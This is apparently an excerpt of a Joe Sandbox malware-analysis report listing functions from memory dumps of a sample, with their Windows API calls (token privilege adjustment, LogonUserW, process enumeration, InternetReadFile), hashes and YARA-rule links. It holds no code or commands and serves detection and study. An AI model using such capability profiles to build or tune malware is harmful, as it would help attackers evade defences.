Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: ae790960f3d4c8e62e56864062b5c20bb6eedd766a6d329a5338d4634f6ae914
Instruction ID: 4dff09883f88fc3f9c959825fd88c4a8c74283b05488ec08a5e8512701ef589d
Opcode Fuzzy Hash: ae790960f3d4c8e62e56864062b5c20bb6eedd766a6d329a5338d4634f6ae914
Instruction Fuzzy Hash: D1518071504711AFD360EF28D885E6BBBE9FF94710F00482EF595973A1EB709904CB92

Function 0062E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0062E628

Strings

|, xrefs: 0062E658
(, xrefs: 0062E66E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 36ef52605d798da2493f404771dd916226d701754f1ad44ffe4db412b8e88be7
Instruction ID: b536013fb34d166b27746ed337f46c6fabbdf219ea1f8d64c013eb3a12069a65
Opcode Fuzzy Hash: 36ef52605d798da2493f404771dd916226d701754f1ad44ffe4db412b8e88be7
Instruction Fuzzy Hash: 39323475A00B159FDB28CF19D4819AAB7F1FF48320B15C46EE89ADB3A1E771A941CF40

Function 006422EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0064180A,00000000), ref: 006423E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00642418

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: ad229d12050e05ac9670924ec43a963e3e5d6dd00e180877bd69cbc4637e6816
Instruction ID: 1f0a11d8e426627b6a3be9d6b19904d322891180f5a17bea6bfe31ead9cbc572
Opcode Fuzzy Hash: ad229d12050e05ac9670924ec43a963e3e5d6dd00e180877bd69cbc4637e6816
Instruction Fuzzy Hash: CD41F47190420ABFEB11DE95DC95EFBBBFEEB40314F60406AF601A7241EA749E419660

Function 0063B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0063B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0063B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0063B3EA

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: a98d58a3afbf2b2fe6089c3f72bf5dea9441dc7e69197d135768edfc27913917
Instruction ID: 044617a8b24deb942fb0a112cb0e0626be4e08ece11b72a4189ef25e88485961
Opcode Fuzzy Hash: a98d58a3afbf2b2fe6089c3f72bf5dea9441dc7e69197d135768edfc27913917
Instruction Fuzzy Hash: 22216035A00618EFCB00EFA5D885AEDBBB9FF49310F1480AAF905EB351DB319915CB90

Function 006287E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 005F0DB6: std::exception::exception.LIBCMT ref: 005F0DEC
Part of subcall function 005F0DB6: __CxxThrowException@8.LIBCMT ref: 005F0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0062882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00628858
GetLastError.KERNEL32 ref: 00628865

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 017400a238ae2f968606c04588fd19093a821bc0f27b9cd78134abaec2c07c5e
Instruction ID: c1d85866fccc1f7b338198f763d256ee67a6d55b3bf740d8ae6a156334d8226a
Opcode Fuzzy Hash: 017400a238ae2f968606c04588fd19093a821bc0f27b9cd78134abaec2c07c5e
Instruction Fuzzy Hash: 8D1160B1414305AFE718EF54EC89D6BB7ADFB44711B24852EE45597241EB34BC418B60

Function 0062874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00628774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0062878B
FreeSid.ADVAPI32(?), ref: 0062879B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 755be902df21305e39790d5aa66575b1d90ca0de2211b07c7c753018f62d7896
Instruction ID: 8115d788eb079da91507a3d5e00a7fed98cbf696c46a2f37c819e9abc3012370
Opcode Fuzzy Hash: 755be902df21305e39790d5aa66575b1d90ca0de2211b07c7c753018f62d7896
Instruction Fuzzy Hash: 64F06D75A1130CBFDF00DFF4DC99ABEBBBDEF08211F1044A9A902E2281E7716A448B50

Function 00638889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0063889B

Part of subcall function 005F520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00638F6E,00000000,?,?,?,?,0063911F,00000000,?), ref: 005F5213
Part of subcall function 005F520A: __aulldiv.LIBCMT ref: 005F5233

Strings

0ei, xrefs: 00638892

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0ei
API String ID: 2893107130-4157504156
Opcode ID: bc794e758e1cf206891c392aa12dc9080ce02fd3ff0b7bdb6380eb658b47ba89
Instruction ID: b735367dca7ce3e8868fb29f57ba19f11849ba4e592070b3c98356493f591575
Opcode Fuzzy Hash: bc794e758e1cf206891c392aa12dc9080ce02fd3ff0b7bdb6380eb658b47ba89
Instruction Fuzzy Hash: A821D232625610CFC729CF25D841A92B3E6EBA4310F298E2CE1F5CB2D0CA34A905CB94

Function 00634C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00634CB3

Strings

DOWN, xrefs: 00634C98

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: af45daffef2b9737edf5a00212b47ef2ee80e68fa9efb4f53446e68e95d29504
Instruction ID: fa724dfe8432cb825b68dce1f6176ad642c0e5b2bf232e1387a8b17810c6815f
Opcode Fuzzy Hash: af45daffef2b9737edf5a00212b47ef2ee80e68fa9efb4f53446e68e95d29504
Instruction Fuzzy Hash: C9E08CB219D7223CB9042A58BC07EF7078D9F22335F211206F910E51C1ED852C8265E8

Function 0063C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0063C6FB
FindClose.KERNEL32(00000000), ref: 0063C72B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 2e24d01184aa7726235b001e5275f6d844c870806459e38e3c9fdd9e0acfe4b9
Instruction ID: 14c79fe1db00f63681d944945e52e0d86c5575a88b53de730a72a0ca4cd38574
Opcode Fuzzy Hash: 2e24d01184aa7726235b001e5275f6d844c870806459e38e3c9fdd9e0acfe4b9
Instruction Fuzzy Hash: 10117C726006019FDB10EF29D849A2AB7E9FF85321F00851EF9A9D73A0DB30A801CB81

Function 0063A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00649468,?,0065FB84,?), ref: 0063A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00649468,?,0065FB84,?), ref: 0063A0A9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 3acb7a9221aa9c41e7b85e6e0936956553aeb6a05b3872fd1dbaf075618c66ab
Instruction ID: 6f73fdcc35776c0cd1d5fe16029b5f1b662bc2b1172400b56057a2d6fceae41d
Opcode Fuzzy Hash: 3acb7a9221aa9c41e7b85e6e0936956553aeb6a05b3872fd1dbaf075618c66ab
Instruction Fuzzy Hash: 12F0823514532DABDB21AFA4CC48FEA776EBF09361F004166F959D7281D7309A40CBE1

Function 006281CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00628309), ref: 006281E0
CloseHandle.KERNEL32(?,?,00628309), ref: 006281F2

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c0e9e49f55b236c1101e8a422084ad4a6499a100eb97829d7c55721f74eb3d3a
Instruction ID: ac9bb07a69ecc76736d0dc15859012377ac221f0e2bc5066a4ab173f75104d43
Opcode Fuzzy Hash: c0e9e49f55b236c1101e8a422084ad4a6499a100eb97829d7c55721f74eb3d3a
Instruction Fuzzy Hash: 39E08631001611AFE7212B20FC08D737BEEFF00311B14982DF555804B1CB215C90DB10

Function 005FA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,005F8D57,?,?,?,00000001), ref: 005FA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005FA163

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: def8d6a7666a8aa807598846850af6e664b1bd845ae478687d095f500eddb3bd
Instruction ID: dd24603628e0d1268147085d134ed43a8132383d2f7e17f13a1592013e789fb0
Opcode Fuzzy Hash: def8d6a7666a8aa807598846850af6e664b1bd845ae478687d095f500eddb3bd
Instruction Fuzzy Hash: C0B09231054308ABEB006F91ED09B893F6AEB44AA3F405020F60D84070CF6254508AD1

Function 005FF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e17c375b055a584a7038ce68c946144f3efae666144a2d0f9243253d681974
Instruction ID: 1ae8dfdaba139a33b5f58d17199d69fc34a6188eaa3fc5922e7b180d9de80ab4
Opcode Fuzzy Hash: 23e17c375b055a584a7038ce68c946144f3efae666144a2d0f9243253d681974
Instruction Fuzzy Hash: AD321521D29F054DD7239A34D932335A649BFB73C8F15D737E81AB5EA6EB68C4834200

Function 0060242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1167880ac7374489dba97ff863a68726f2428a6165f12b79d43f3df770182abe
Instruction ID: 878c8987e4363e46499735db24ef92fe1bd0a0400eea7e4619c2c8d36d46f95f
Opcode Fuzzy Hash: 1167880ac7374489dba97ff863a68726f2428a6165f12b79d43f3df770182abe
Instruction Fuzzy Hash: 52B12130D2AF414DD32396398835336B68DAFBB2C5F51E71BFC2670E62EB6285834541

Function 006287B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00628389), ref: 006287D1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 9cfa85b07153a2f9ebc0d44a8b1cf3ae86c463dd35cf09106f800c39ca2a414a
Instruction ID: f1767624edd67033d81415a736e4da27c7032ee530a217aea49cb53df6e30282
Opcode Fuzzy Hash: 9cfa85b07153a2f9ebc0d44a8b1cf3ae86c463dd35cf09106f800c39ca2a414a
Instruction Fuzzy Hash: 1FD05E3226060EABEF018FA4DC01EAE3B6AEB04B01F408111FE15C50A1C775D835AB60

Function 005FA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 005FA12A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d19cc2a004fec3c001629fd2041d86e7b6612c39b52edd8ae27fcf89dc1975a7
Instruction ID: e51cbce68a99669e651745ce8e8a1d2a9c05bbea89b8b93fc521d0e91283e77b
Opcode Fuzzy Hash: d19cc2a004fec3c001629fd2041d86e7b6612c39b52edd8ae27fcf89dc1975a7
Instruction Fuzzy Hash: 3EA0113000020CAB8B002F82EC08888BFAEEA002A2B008020F80C800328F32A8208AC0

Function 005E8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b1a6dbdf87547547ab0d11ecf7e38b5917e3117128df7e9666ccbf8bc6c778
Instruction ID: 93447b06a28c4e49022506bd3cad50bd997cb943cbd7a1b7df255b42b9de8f63
Opcode Fuzzy Hash: c3b1a6dbdf87547547ab0d11ecf7e38b5917e3117128df7e9666ccbf8bc6c778
Instruction Fuzzy Hash: 8A2247309049A6CBDF3C8A16E4943BC7BA2FF41354F28846AD9DBCB592DB709D91CB41

Function 005F21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 931427f927241aa83674c718d4812886cc2ba70f1219636067942eb9825fb478
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 3BC1A1762094974ADF2D463A843403FFEA17EA27B171A076DD9B3CF1D4EE28C925D620

Function 005F25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: e1bc05c1aa4088846a4719d2765ed91d2b2d2d383628b84f0f07543e54f2bd62
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 3FC1A0722095974ADF2D463AC43403FBEA1BEA27B171A076DD5B3DB0D4EE28C924D620

Function 005F1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 81e3d15e5d28f9506ed520158c6da32b00eaa1f304a001fe4231a03bd3596109
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 57C19F3220999789DF2D463AC43403FBFA17EA27B131A076DD5B3CB1C4EE28C925D664

Function 00647806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0064785B
DeleteObject.GDI32(00000000), ref: 0064786D
DestroyWindow.USER32 ref: 0064787B
GetDesktopWindow.USER32 ref: 00647895
GetWindowRect.USER32(00000000), ref: 0064789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006479DD
